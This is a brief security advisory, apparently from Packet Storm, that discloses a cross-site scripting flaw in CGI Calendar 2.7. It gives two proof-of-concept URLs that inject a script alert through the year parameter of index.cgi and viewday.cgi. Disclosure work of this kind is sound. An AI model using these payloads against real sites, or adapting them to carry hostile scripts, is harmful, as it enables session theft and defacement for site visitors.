cgiCal27XSS.txt

2006-03-02T00:00:00
ID PACKETSTORM:44272
Type packetstorm
Reporter Revnic Vasile
Modified 2006-03-02T00:00:00

Description

                                        
                                            `CGI Calendar XSS Vulnerability  
  
  
Software: CGI Calendar  
Version: 2.7  
http://cgicalendar.sourceforge.net/  
  
Description: an online calendar implemented using CGI technology  
  
Vulnerability: Cross-Site Scripting  
  
Exploit:  
/cgi-bin/calendar2/index.cgi?lang=en-us&mode=all&month=2&date=1&year=<script>alert('xss');</script>&db=1  
  
/cgi-bin/calendar2/viewday.cgi?lang=en-us&mode=all&month=2&date=1&year=<script>alert('xss');</script>&db=1  
  
Credit:  
Discovered by Revnic Vasile  
revnic@gmail.com  
`